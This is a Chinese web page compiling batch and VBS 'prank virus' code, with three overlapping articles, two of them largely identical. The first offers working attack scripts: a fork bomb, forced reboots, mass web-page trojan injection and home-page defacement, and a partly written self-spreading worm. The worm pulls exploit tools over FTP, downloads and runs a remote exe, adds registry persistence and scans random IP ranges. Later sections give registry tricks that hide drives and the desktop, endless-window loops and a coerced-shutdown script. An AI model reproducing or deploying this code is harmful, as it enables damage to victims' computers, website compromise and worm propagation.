bat整人电脑病毒代码是怎样的 |
您所在的位置:网站首页 › bat病毒教程 › bat整人电脑病毒代码是怎样的 |
篇一:一些bat恶搞代码 第一个:让别人内存OVER(逼他重启) @echo off start cmd %0 就这3行了 第二个:让对方重启指定次数(害人专用) @echo off if not exist c:\1.txt echo. >c:\1.txt & goto err1 if not exist c:\2.txt echo. >c:\2.txt & goto err1 if not exist c:\3.txt echo. >c:\3.txt & goto err1 if not exist c:\4.txt echo. >c:\4.txt & goto err1 if not exist c:\5.txt echo. >c:\5.txt & goto err1 goto err2 :err1 shutdown -s -t 0 :err2 上面可以让对方电脑重启5次后不在重启 第三个:自动踢人(3389肉机保护自己专用) @echo off logoff 1 del log.bat logoff后面的1改成自己登陆的ID号,用query user查看 第四个: 批量自动溢出 @for /f %%i in (result.txt) do 42 %%i 58.44.89.158 521 先自己用NC监听端口,多开几个,然后指行,就自动溢出了 第五个:自动挂马改主页 @echo off cls rem 直接打批处理名字就有帮助 title 批量挂马,改首页(伤脑筋 QQ:447228437). color A set pan=%1 set ye=%2 set dai=%3 if "%pan%"=="" goto e1 if "%ye%"=="" goto e1 if "%dai%"=="" goto e1 if "%dai%"=="htm.txt" goto u1 forfiles /p %pan% /m %ye% /s /c "cmd /c if @isdir==FALSE echo ^ >>@path" echo. echo代码全部插入完毕!!!! echo. pause goto e1 :u1 echo 您现在的操作将使%pan%盘下,全部名为%ye%的内容变为您要更改的内容. echo 这将是非常危险的,您真的要这样做? 回车却认,Ctrl+c取消操作. pause forfiles /p %pan% /m %ye% /s /c "cmd /c if @isdir==FALSE copy %1\htm.txt @path /y" echo. echo 首页全部更改完必!!!!如果您发现没有替换成功,请将%ye%文件只读属性去掉. echo. pause :e1 echo. echo 本批处理只适用于2003系统,其他系统要使用,请将forfiles.exe拷贝至系统盘system32目录下 echo 用法:snj ^ ^ ^ echo 例子:snj d:\ index.asp /mm.htm echo 批处理将自动添加^标记 echo. echo 如果您要更改全部网站的首页!请在批处理文件所在目录下,新建一个名为htm.txt的文本文件. echo 然后将要更改的代码加COPY到里面保存.然后将命令的^项输入为htm.txt即可. echo 例子:snj d:\ index.asp htm.txt echo. echo 为了能准确无误执行批处理请最好先把记事本的"自动换行功能去掉",让 命令保持在一行才能正确执行. echo. echo 使用此批处理造成一切后果本人概不负责,请大家谨慎使用! echo. 第六个:利用批处理编写利用系统漏洞传播的蠕虫病毒 本来想写完后在做教程,要去学校了,所以先把思路告诉大家,大家可以先自己写写,我有时间写完发到群里. 这些是我未完成的批处理,大家可以在此基础上按照我下面说的思路继续写完 del c:\42.exe del c:\nc.exe del c:\ip.exe echo dim wsh > %systemroot%\help\test.vbs echo set wsh=CreateObject("WScript.Shell") >> %systemroot%\help\test.vbs echo wsh.run "cmd /c %systemroot%\help\nc -v -l -p 810 < %systemroot%\help\or.txt",0 >> %systemroot%\help\test.vbs echo dim wsh > %systemroot%\help\test2.vbs echo set wsh=CreateObject("WScript.Shell") >> %systemroot%\help\test2.vbs echo wsh.run "cmd /c start %systemroot%\help\good.bat",0 >> %systemroot%\help\test2.vbs echo open 10.0.0.5 > %systemroot%\help\ftp.txt echo open myyes >> %systemroot%\help\ftp.txt echo 1 >> %systemroot%\help\ftp.txt echo binary >> %systemroot%\help\ftp.txt echo get 42.exe c:\42.exe >> %systemroot%\help\ftp.txt echo get nc.exe c:\nc.exe >> %systemroot%\help\ftp.txt echo get ip.exe c:\ip.exe >> %systemroot%\help\ftp.txt echo bye >> %systemroot%\help\ftp.txt echo echo Set xPost = CreateObject("Microsoft.XMLHTTP") ^>1.vbs > %systemroot%\help\or.txt echo echo xPost.Open "GET","http://10.0.0.5/my.exe&quo...,0 ^>^>1.vbs >> %systemroot%\help\or.txt echo echo xPost.Send() ^>^>1.vbs >> %systemroot%\help\or.txt echo echo Set sGet = CreateObject("ADODB.Stream") ^>^>1.vbs >> %systemroot%\help\or.txt echo echo sGet.Mode = 3 ^>^>1.vbs >> %systemroot%\help\or.txt echo echo sGet.Type = 1 ^>^>1.vbs >> %systemroot%\help\or.txt echo echo sGet.Write(xPost.responseBody) ^>^>1.vbs >> %systemroot%\help\or.txt echo echo sGet.SaveToFile "d:\my.exe",2 ^>^>1.vbs >> %systemroot%\help\or.txt echo echo 1.vbs ^>^>1.vbs >> %systemroot%\help\or.txt echo echo my.exe ^>^>1.vbs >> %systemroot%\help\or.txt echo Windows Registry Editor Version 5.00 > %systemroot%\help\1.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> %systemroot%\help\1.reg echo "SKYNET Personal FireWall"="F:\\系统安全工具 \\FireWall\\PFW.exe" >> %systemroot%\help\1.reg echo "1"="%systemroot%\\help\\test2.vbs" >> %systemroot%\help\1.reg if not exist %systemroot%\help\good.bat copy good.bat %systemroot%\help\good.bat & %systemroot%\help\test2.vbs & del good.bat regedit -s %systemroot%\help\1.reg ftp -s:%systemroot%\help\ftp.txt move c:\nc.exe %systemroot%\help\ /y move c:\42.exe %systemroot%\help\ /y move c:\ip.exe %systemroot%\help\ /y %systemroot%\help\test.vbs rem for /f %%i in (result1.txt) do set a=%%i rem for /f %%j in (result.txt) do 42 %a% %%j 810 准备: 1:找一个反向连接的溢出攻击程序,如ms06040漏洞 2:找呀一个免费FTP空间,最好是送域名的 3:利用你所知道的高级语言编写一个,能生成随机范围IP地址和找到本机IP的工具. 思路: 用for语句对指定文本里的IP进行溢出,然后用if语句判断是否溢出成功, 如果成功开启一个NC监听端口,NC后面带一个 < 输入符号 输入的内容为下载本批处理文件,然后执行这个批处理.这样被溢出的机器就又会在他那里运行我门的批处理,从而到自动传播的目的. 把批处理生成的文件集中放到一个目录下,可以%systemroot%系统变量直接放到系统目录下 因为批处理运行后会闪出命令行窗口,我门可以利用VBS脚本来运行我们的批处理,这样就不会有任何窗口出现,脚本如下 echo dim wsh > %systemroot%\help\test.vbs echo set wsh=CreateObject("WScript.Shell") >> %systemroot%\help\test.vbs echo wsh.run "cmd /c %systemroot%\help\nc -v -l -p 810 < %systemroot%\help\or.txt",0 >> %systemroot%\help\test.vbs 生成随机IP工具的VB代码 Private Sub Form_Load() Dim fso As New FileSystemObject Dim a, b, c, d As Integer Dim ph, e As String ph = App.Path & "\" & "ip.txt" Randomize a = Int(253 * Rnd + 1) b = Int(253 * Rnd + 1) c = Int(240 * Rnd + 1) Open ph For Output As #1 For i = c To c + 7 For j = 1 To 254 e = a & "." & b & "." & i & "." & j Print #1, e DoEvents Next j Next i Close #1 Unload Me End Sub 篇二:整人“病毒”代码(一) 发表于 2013-10-23 10:33 前段时间看到大家对这种整人的代码兴趣还挺浓厚的,我最近就收集了一些和大家分享。 PS:由于精力问题没有对代码的可用性进行一一验证,所以不保证全部可用,大家如果发现有不可用的或者需要改进的地方请提出来,以下代码仅供娱乐,请勿用于非法用途。 一、怎么点都没反应的桌面 如果同事的电脑开着,他离开电脑前一会,嘿嘿,机会来了。 把他的电脑桌面按print键截屏截下来,(当然QQ截屏也可以,不过效果不太逼真!)建议大家用print截屏,设置为桌面。 然后把原来在桌面上的文件统统移到一个盘的文件夹里,这样桌面看上去和平时一个样。他回来后狂点鼠标,却怎么都没有反应!现在还在关机,开机,关机,开机,关机,开机中???? 附带:print键截屏方法: 键盘右上方的“Print Screen Sys Rq”键的作用是屏幕抓图! 用法一,按“Print Screen SysRq”一下,对当前屏幕进行抓图,就是整个显示屏的内容。 用法二,先按住“Alt”键,再按 “Print Screen SysRq”键,则是对当前窗口进行抓图。如你打开“我的电脑”后,用此法就抓取“我的电脑”窗口的内容。 用上诉两种方法抓图后,再打开“开始”、“附件”里的“画图”程序,点“编辑”、“粘贴”就把抓取的图片贴出来了,可以保存为自己需要的格式。哈哈,简单吧,这方法真挺搞的,有兴趣的童鞋可以试试! 二、让电脑硬盘消失-隐藏磁盘方法 愚人节电脑整人使无端端地电脑磁盘的某个分区消失了,钻进地缝里面去了吗,给外星人抓走了??非也!是某些人使坏将其隐藏起来了! 步骤 1.新建一个记事本 2.将记事本的后缀改为.reg,就是将“新建文件.txt”改为“新建文件.reg” 3.将下面的代码复制到记事本当中: Windows Registry Editor Version 5.00 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] "NoDrives" =hex:08,00,00,00 解释 (1)"NoDrives" =hex:08,00,00,00 这个键值是隐藏D盘的 图中的D盘已经神秘消失了。 (2)A=01000000 B=02000000 C=04000000 D=08000000 E=10000000 F=20000000G=40000000 H=80000000 I=00010000 J=00020000 K=00040000 原理介绍:二进制值 “NoDrives”的缺省值均是00,00,00,00,表示不隐藏任何驱动器。键值由四个字节组成,每个字节的每一位(bit)对应从A:到Z:的一个盘,当相应位为1时,“我的电脑”中相应的驱动器就被隐藏了。第一个字节代表从A到H的8个盘,即01为A,02为B,04为C??依次类推,第二个字节代表I到P,第三个字节代表Q到X,第四个字节代表Y和Z。比如要关闭C盘,将键值改为04,00,00,00;要关闭D盘,则改为 08,00,00,00,若要关闭C盘和D盘,则改为0C,00,00,00(C是十六进制,转成十进制就是12)。 理解了原理后,下面以笔者的电脑为例说明如何操作:笔者的电脑有一个软驱、一个硬盘(5个分区)、一个光驱,盘符分布是这样的:A:(3.5软盘)、 C:、D:、E:、F:、G:、H:(光盘),所以我的“NoDrives”值为“02ffffff”,隐藏了B、I到Z盘。 还原方法 1.点击开始--运行,如图,在运行对话框中输入“regedit”,打开注册表编辑器。 2.依次打开 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer],将右侧窗口中"NoDrives"这个子键删除。 3.重新启动电脑。 三、空空的桌面 电脑桌面是用户最熟悉不过的了,电脑整人方法电脑启动之后首先呈现的就是桌面了,如果在愚人节你把你朋友的桌面给Hack掉了话,你的朋友是不是会发疯啊? 桌面是用户操作电脑首先进入的界面,电脑桌面空空如也,一望无垠的时候,你是否很无奈?原来这一切都是它在作怪! 如图整人后桌面清清爽爽,什么都没有! 方法步骤 1. 新建一个记事本 2.将记事本的后缀改为.reg,就是将“新建文件.txt”改为“桌面.reg” 3.将下面的代码复制到记事本当中: Windows Registry Editor Version 5.00 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies \Explorer] "NoDesktop"=dword:00000001 "NoSetTaskbar"=dword:00000001 解释:(1)"NoDesktop"=dword:00000001 这个键值是屏蔽桌面的; (2)"NoSetTaskbar"=dword:00000001这个键值是禁用“任务栏属性”功能。 将信息导入到注册表之后,桌面图标、桌面右键、桌面属性的功能都被禁用了。 还原方法: 1.点击开始--运行,如图,在运行对话框中输入“regedit”,打开注册表编辑器。 2依次打开 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer],将右侧窗口中“NoDesktop”、“NoSetTaskbar”这两个子键删除。 四、让天使替我说我爱你 CreateObject("SAPI.SpVoice").Speak"i love you" 送给你女朋友她会高兴地,保存为.vbs格式 五、打开无数个计算器 set wsh=createobject("wscript.shell") do wsh.run "calc" loop 这段代码是打开无数个计算器,直到死机 ,也是保存为.vbs格式 六、你被耍了 while(1) msgbox "哈哈 你被耍了!" loop 这段代码就比较坏了,一直弹出窗口显示"哈哈,你被刷了!"要是你不会结束它,只好重启电脑了,也是保存为.vbs格式 七、甩不掉的魔鬼 WScript.Echo("嘿,谢谢你打开我哦,我等你很久拉!"&TSName) WScript.Echo("你是可爱的小朋吗?") WScript.Echo("哈,我想你拉,这你都不知道吗?") WScript.Echo("怎么才来,说~是不是不关心我") WScript.Echo("哼,我生气拉,等你这么久,心都凉啦。") WScript.Echo("小强很生气,后果很严重哦。") WScript.Echo("嘿嘿!你也会很惨滴哦") WScript.Echo("是不是想清除我?") WScript.Echo("那你要点上50下哦,不过会给你惊喜滴") WScript.Echo("还剩49下,快点点哦") WScript.Echo("还剩48下,快点,小笨蛋!") WScript.Echo("还剩47下对,就这样快点点!") WScript.Echo("还剩46下。你啊就是笨,要快哦,我先不打扰你工作。") WScript.Echo("还剩45下,记得要快哦!") WScript.Echo("还剩43下") WScript.Echo("还剩42下") WScript.Echo("还剩41下") WScript.Echo("还剩40下") WScript.Echo("还剩39下") WScript.Echo("还剩38下") WScript.Echo("还剩37下") WScript.Echo("还剩36下") WScript.Echo("还剩35下") WScript.Echo("还剩34下") WScript.Echo("还剩33下") WScript.Echo("还剩32下") WScript.Echo("还剩30下") WScript.Echo("还剩29下") WScript.Echo("还剩28下") WScript.Echo("还剩27下") WScript.Echo("还剩26下") WScript.Echo("还剩25下") WScript.Echo("还剩24下") WScript.Echo("还剩23下") WScript.Echo("还剩22下") WScript.Echo("还剩21下") WScript.Echo("还剩20下") WScript.Echo("还剩19下") WScript.Echo("还剩18下") WScript.Echo("还剩17下") WScript.Echo("还剩16下") WScript.Echo("还剩15下") WScript.Echo("还剩14下") WScript.Echo("还剩13下停停!!!慢点,我有话要说") WScript.Echo("还剩12下,你继续点我就会消失滴") WScript.Echo("还剩11下,以后就看不到我拉。555555") WScript.Echo("还剩10下,你现在可以选择停止!") WScript.Echo("还剩9下。你还点啊,不要我拉?") WScript.Echo("还剩8下,有点伤心拉,干嘛丢弃人家") WScript.Echo("还剩7下。疯了,你有点负意!") WScript.Echo("还剩6下。对。你就点吧,我恨你!") WScript.Echo("还剩5下,不明白,删除我你就好吗?") WScript.Echo("还剩4下!真要删除我?") WScript.Echo("还剩3下。可是我真的很眷恋你。。。") WScript.Echo("还剩2下。不要这么绝情嘛,人家是爱你的!") WScript.Echo("还剩1下。哼,既然你这么绝情。也别怪我无义!!!") WScript.Echo("我本因该消失的,不过我留恋你滴芳容,上帝又给了一次机会。") WScript.Echo("想结素我么?那你就再多点一次") WScript.Echo("想结素我么?那你就再多点一次") WScript.Echo("想结素我么?那你就再多点一次") WScript.Echo("想结素我么?那你就再多点一次") 改成.vbs 八、说我是猪 on error resume next dim WSHshellA set WSHshellA =wscript.createobject("wscript.shell") WSHshellA.run "cmd.exe /c shutdown -r-t 180 -c ""说我是猪,不说我是猪就一分钟关机,不信,试下···"" ",0 ,true dim a do while(a "我是猪") a = inputbox ("说我是猪,就不关机,快撒,说""我是猪"" ","说不说","",8000,7000) msgboxchr(13) + chr(13) + chr(13) +a,0,"MsgBox" loop msgboxchr(13) + chr(13) + chr(13) + "早说就行了嘛" dim WSHshell set WSHshell =wscript.createobject("wscript.shell") WSHshell.run "cmd.exe /c shutdown-a",0 ,true msgboxchr(13) + chr(13) + chr(13) + "哈哈哈哈,好乖" 这个运行后必须输入我是猪(当然你也可以改成别的,把代码中所有的我是猪换成你想改的, 比如说我爱XXX之类的,大家懂的 ),如果一分钟没输入我是猪,就会关机.也改成.vbs 九、被鬼附身的记事本 dim sh,str,a,i setsh=createobject("wscript.shell") sh.run "notepad" '打开记事本 do while sh.appactivate("无标题 - 记事本")=false wscript.sleep 1000 loop str="wokao1!ni1youmeiyou1gaocuo1!"'这一行是演示中文输入。定义要打字的字符串。只能是英文或数字或符号。 '如果想输入中文请把下2行的注释去掉。否则就在前面加上注释符号“'”(不 篇三:整人病毒代码 前段时间看到大家对这种整人的代码兴趣还挺浓厚的,我最近就收集了一些和大家分享。 PS:由于精力问题没有对代码的可用性进行一一验证,所以不保证全部可用,大家如果发现有不可用的或者需要改进的地方请提出来,以下代码仅供娱乐,请勿用于非法用途。 一、怎么点都没反应的桌面 如果同事的电脑开着,他离开电脑前一会,嘿嘿,机会来了。 把他的电脑桌面按print键截屏截下来,(当然QQ截屏也可以,不过效果不太逼真!)建议大家用print截屏,设置为桌面。 然后把原来在桌面上的文件统统移到一个盘的文件夹里,这样桌面看上去和平时一个样。他回来后狂点鼠标,却怎么都没有反应!现在还在关机,开机,关机,开机,关机,开机中???? 附带:print键截屏方法: 键盘右上方的“Print Screen Sys Rq”键的作用是屏幕抓图! 用法一,按“Print Screen SysRq”一下,对当前屏幕进行抓图,就是整个显示屏的内容。 用法二,先按住“Alt”键,再按 “Print Screen SysRq”键,则是对当前窗口进行抓图。如你打开“我的电脑”后,用此法就抓取“我的电脑”窗口的内容。 用上诉两种方法抓图后,再打开“开始”、“附件”里的“画图”程序,点“编辑”、“粘贴”就把抓取的图片贴出来了,可以保存为自己需要的格式。 哈哈,简单吧,这方法真挺搞的,有兴趣的童鞋可以试试! 二、让电脑硬盘消失-隐藏磁盘方法 愚人节电脑整人使无端端地电脑磁盘的某个分区消失了,钻进地缝里面去了吗,给外星人抓走了??非也!是某些人使坏将其隐藏起来了! 步骤 1.新建一个记事本 2.将记事本的后缀改为.reg,就是将“新建文件.txt”改为“新建文件.reg” 3.将下面的代码复制到记事本当中: Windows Registry Editor Version 5.00 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] "NoDrives" =hex:08,00,00,00 解释 (1)"NoDrives" =hex:08,00,00,00 这个键值是隐藏D盘的 图中的D盘已经神秘消失了。 (2)A=01000000 B=02000000 C=04000000 D=08000000 E=10000000 F=20000000G=40000000 H=80000000 I=00010000 J=00020000 K=00040000 原理介绍:二进制值 “NoDrives”的缺省值均是00,00,00,00,表示不隐藏任何驱动器。键值由四个字节组成,每个字节的每一位(bit)对应从A:到Z:的一个盘,当相应位为1时, “我的电脑”中相应的驱动器就被隐藏了。第一个字节代表从A到H的8个盘,即01为A,02为B,04为C??依次类推,第二个字节代表I到P,第三个字节代表Q到X,第四个字节代表Y和Z。比如要关闭C盘,将键值改为04,00,00,00;要关闭D盘,则改为 08,00,00,00,若要关闭C盘和D盘,则改为0C,00,00,00(C是十六进制,转成十进制就是12)。 理解了原理后,下面以笔者的电脑为例说明如何操作:笔者的电脑有一个软驱、一个硬盘(5个分区)、一个光驱,盘符分布是这样的:A:(3.5软盘)、 C:、D:、E:、F:、G:、H:(光盘),所以我的“NoDrives”值为“02 ff ff ff”,隐藏了B、I到Z盘。 还原方法 1.点击开始--运行,如图,在运行对话框中输入“regedit”,打开注册表编辑器。 2.依次打开 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer],将右侧窗口中"NoDrives"这个子键删除。 3.重新启动电脑。 三、空空的桌面 电脑桌面是用户最熟悉不过的了,电脑整人方法电脑启动之后首先呈现的就是桌面了,如果在愚人节你把你朋友的桌面给Hack掉了话,你的朋友是不是会发疯啊? 桌面是用户操作电脑首先进入的界面,电脑桌面空空如也,一望无垠的时候,你是否很无奈?原来这一切都是它在作怪! 《bat整人电脑病毒代码是怎样的》出自:百味书屋 链接地址:http://www.850500.com/news/32932.html 转载请保留,谢谢! |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |